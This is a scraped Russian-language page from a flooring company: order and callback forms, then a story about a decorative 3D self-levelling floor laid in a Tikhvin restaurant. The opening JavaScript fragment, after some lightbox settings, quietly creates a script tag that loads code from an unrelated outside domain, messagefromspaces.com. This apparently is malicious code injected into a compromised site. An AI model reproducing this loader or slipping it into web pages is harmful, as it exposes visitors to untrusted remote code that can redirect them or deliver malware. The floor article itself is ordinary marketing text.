, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); } var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Заказать услуги онлайн




Заполните форму ниже, чтоби оставить заявку на наши услуги или продукцию. Наши специалисты обязательно свяжутся с Вами в ближайшее время!

Поля, помеченные *,обязательны для заполнения


Имя

заказ  

телефон*

Перезвонить Вам?




Закажите БЕСПЛАТНЫЙ обратный звонок нашего специалиста, и он обязательно свяжется с Вами в ближайшее время

Поля, помеченные *, обязательны для заполнения

Ваше имя

Номер телефона*

(812) 372-67-66

Москва

(495) 638-52-50

Санкт-Петербург

(812) 372-67-66


Завершен очередной проект «Мостовая в холле ресторана»


Как часто мы обращаем внимание на полы в ресторане? «А что в нем может быть особенного?» — удивятся многие. И окажутся правы, ведь полы — не та часть помещения, при работе с которой дизайнеры «включают» фантазию. Но мы готовы поспорить с этим утверждением — именно пол может стать ярким акцентом интерьера любого ресторана. Подтверждением этому служит проект, который не так давно был завершен нашими специалистами.

На юго-востоке от Санкт-Петербурга находится небольшой городок Тихвин, и именно здесь профессиональные сотрудники компании заливали наливной пол в ресторане. Сложность проекта заключалась в том, что хозяйка заведения решилась на изменения в интерьере в честь собственного 75-летнего юбилея. Несмотря на всю ответственность задачи, многочисленные пожелания заказчицы сводились к одному желанию — удивить гостей! Пожалуй, для выполнения такого задания не существует лучшего решения, чем устройство наливных полов — невероятные визуальные эффекты, особенно в 3D-исполнении, позволяют выполнить любые капризы клиента и вызвать восхищенные возгласы.

Сегодня и постоянные посетители ресторана в Тихвине, и случайные гости, зашедшие отобедать или поужинать, обращают внимание на необычные полы в заведении. Это неудивительно — попадая внутрь помещения, Вы словно оказываетесь на булыжной мостовой с невероятно реалистичным канализационным люком посередине. В основном зале посетителей ожидает еще один сюрприз: здесь под ногами распускается огромный райский цветок. Все это — декоративный наливной пол, благодаря которому интерьер ресторана стал более стильным, ярким и праздничным.

Стоит отметить, что, помимо отличных эстетических свойств, наливные полы обладают прекрасными эксплуатационными характеристиками — они долговечны, устойчивы к интенсивным механическим воздействиям и легко чистятся. Разве это не является замечательным подарком к юбилею?!

Посмотреть все фотографии готового объекта Вы можете в фотогалерее.